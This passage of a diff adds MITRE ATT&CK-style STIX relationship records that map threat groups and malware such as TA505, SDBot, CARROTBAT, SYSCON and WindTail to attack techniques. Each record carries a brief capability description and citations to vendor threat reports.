+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to access the file system on a compromised host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--76d47356-a255-48ba-9cd8-1ff2e52bb165",
+ "type": "relationship",
+ "modified": "2020-06-01T14:41:54.891Z",
+ "created": "2020-06-01T14:41:54.891Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to use RDP to connect to victim's machines.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7aef9a3f-82ff-4e2e-bee7-962b49421067",
+ "type": "relationship",
+ "modified": "2020-06-01T14:41:54.887Z",
+ "created": "2020-06-01T14:41:54.887Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c07d6bad-8249-46c2-971f-66e779229be0",
+ "type": "relationship",
+ "modified": "2020-06-01T14:53:46.735Z",
+ "created": "2020-06-01T14:43:27.315Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--351bb2c4-db16-4c82-9539-3851dd61c608",
+ "type": "relationship",
+ "modified": "2020-06-01T14:43:27.401Z",
+ "created": "2020-06-01T14:43:27.401Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has embedded a \"vmdetect.exe\" executable to execute right at the start to identify virtual machines.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--6176ae5b-cd96-4b15-8539-5fb6e230fd5d",
+ "type": "relationship",
+ "modified": "2020-06-01T15:28:39.662Z",
+ "created": "2020-06-01T15:28:39.662Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce",
+ "external_references": [
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used TinyMet to enumerate members of privileged groups.(Citation: IBM TA505 April 2020) [TA505](https://attack.mitre.org/groups/G0092) has also run net group /domain.(Citation: Trend Micro TA505 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a9a39a39-b339-41d9-9790-198ac9352bfd",
+ "type": "relationship",
+ "modified": "2020-06-16T16:57:13.559Z",
+ "created": "2020-06-01T15:46:47.567Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
+ "external_references": [
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used stolen domain admin accounts to compromise additional hosts.(Citation: IBM TA505 April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b7a9afc1-3bbf-4eda-9709-5392156c1e41",
+ "type": "relationship",
+ "modified": "2020-06-01T15:46:47.602Z",
+ "created": "2020-06-01T15:46:47.602Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
+ "external_references": [
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used UPX to obscure malicious code.(Citation: IBM TA505 April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--573f3932-8435-4b4a-b138-d9c955495197",
+ "type": "relationship",
+ "modified": "2020-06-01T15:46:47.631Z",
+ "created": "2020-06-01T15:46:47.631Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used HTTP to communiate with C2 nodes.(Citation: IBM TA505 April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f8e25c1f-84bd-4ddd-bf18-51543d5cff94",
+ "type": "relationship",
+ "modified": "2020-06-01T15:46:47.636Z",
+ "created": "2020-06-01T15:46:47.636Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has been seen injecting a DLL into winword.exe.(Citation: IBM TA505 April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f1459bdf-06ae-435a-8506-1e8e444a410b",
+ "type": "relationship",
+ "modified": "2020-06-15T22:35:29.449Z",
+ "created": "2020-06-01T15:46:47.646Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
+ "external_references": [
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has used a packed installer file.(Citation: IBM TA505 April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--63ae56fe-04c2-41f5-a2be-c1880e67b490",
+ "type": "relationship",
+ "modified": "2020-06-16T16:43:36.256Z",
+ "created": "2020-06-01T16:11:40.135Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to execute command line arguments on a compromised host.(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--31864818-132a-48c8-ac12-723463d4f8dc",
+ "type": "relationship",
+ "modified": "2020-06-02T15:39:14.511Z",
+ "created": "2020-06-02T15:39:14.510Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/",
+ "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020."
+ },
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0b37289c-b118-45f7-98b2-5efe06cbf0b2",
+ "type": "relationship",
+ "modified": "2020-06-10T15:05:57.806Z",
+ "created": "2020-06-02T15:39:14.548Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/",
+ "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to download and execute a remote file via [certutil](https://attack.mitre.org/software/S0160).(Citation: Unit 42 CARROTBAT November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--9e81f24e-6f72-44eb-9f19-2a3e7dca14ad",
+ "type": "relationship",
+ "modified": "2020-06-15T15:12:44.278Z",
+ "created": "2020-06-02T15:39:14.573Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/",
+ "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to download a base64 encoded payload and execute obfuscated commands on the infected host.(Citation: Unit 42 CARROTBAT November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--fd37b358-d005-4662-a200-771f89d491f4",
+ "type": "relationship",
+ "modified": "2020-06-10T15:05:57.820Z",
+ "created": "2020-06-02T15:39:14.578Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/",
+ "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to delete downloaded files from a compromised host.(Citation: Unit 42 CARROTBAT November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--ec0f8f62-0eb6-4d40-a8c2-c3a083a79acd",
+ "type": "relationship",
+ "modified": "2020-06-15T15:13:27.764Z",
+ "created": "2020-06-02T17:42:45.479Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--edf5aee2-9b1c-4252-8e64-25b12f14c8b3",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use [Tasklist](https://attack.mitre.org/software/S0057) to list running processes.(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b5744487-e865-4ff2-9d69-e98c1148aade",
+ "type": "relationship",
+ "modified": "2020-06-15T15:17:10.120Z",
+ "created": "2020-06-02T18:46:58.573Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--edf5aee2-9b1c-4252-8e64-25b12f14c8b3",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use [Systeminfo](https://attack.mitre.org/software/S0096) to identify system information.(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--01ebd689-8233-409a-a12d-eafb2546f665",
+ "type": "relationship",
+ "modified": "2020-06-15T15:17:10.123Z",
+ "created": "2020-06-02T18:46:58.612Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--edf5aee2-9b1c-4252-8e64-25b12f14c8b3",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[SYSCON](https://attack.mitre.org/software/S0464) has the ability to execute commands through [cmd](https://attack.mitre.org/software/S0106) on a compromised host.(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--4469d943-1e9b-47a9-8e91-cc7883b918cb",
+ "type": "relationship",
+ "modified": "2020-06-10T14:55:06.358Z",
+ "created": "2020-06-02T18:46:58.620Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--edf5aee2-9b1c-4252-8e64-25b12f14c8b3",
+ "target_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/",
+ "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020."
+ },
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use FTP in C2 communications.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--bceb819a-0ab5-412b-9671-de67e980cb77",
+ "type": "relationship",
+ "modified": "2020-06-02T19:40:02.004Z",
+ "created": "2020-06-02T18:46:58.662Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--edf5aee2-9b1c-4252-8e64-25b12f14c8b3",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/",
+ "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[SYSCON](https://attack.mitre.org/software/S0464) has been executed by luring victims to open malicious e-mail attachments.(Citation: Unit 42 CARROTBAT November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--94f1a9b7-e068-49b8-a2b7-9eb59055476c",
+ "type": "relationship",
+ "modified": "2020-06-02T19:40:02.006Z",
+ "created": "2020-06-02T18:46:58.670Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4",
+ "target_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[CARROTBALL](https://attack.mitre.org/software/S0465) has the ability to use FTP in C2 communications.(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--4b569311-24d2-439d-badb-a5076955cda3",
+ "type": "relationship",
+ "modified": "2020-06-02T19:36:48.172Z",
+ "created": "2020-06-02T19:36:48.172Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[CARROTBALL](https://attack.mitre.org/software/S0465) has the ability to download and install a remote payload.(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--6d5221c3-2efa-4374-8842-8c955fda112b",
+ "type": "relationship",
+ "modified": "2020-06-02T19:36:48.191Z",
+ "created": "2020-06-02T19:36:48.191Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[CARROTBALL](https://attack.mitre.org/software/S0465) has been executed through users being lured into opening malicious e-mail attachments.(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7c9b61d8-30ff-4594-9cfb-90f2db44ca0e",
+ "type": "relationship",
+ "modified": "2020-06-02T19:36:48.212Z",
+ "created": "2020-06-02T19:36:48.212Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) has the ability to decrypt strings using hard-coded AES keys.(Citation: objective-see windtail1 dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--b4016d43-d8c4-4ca2-b119-0681ebe8aaff",
+ "type": "relationship",
+ "modified": "2020-06-04T19:45:16.042Z",
+ "created": "2020-06-04T19:45:16.042Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ },
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
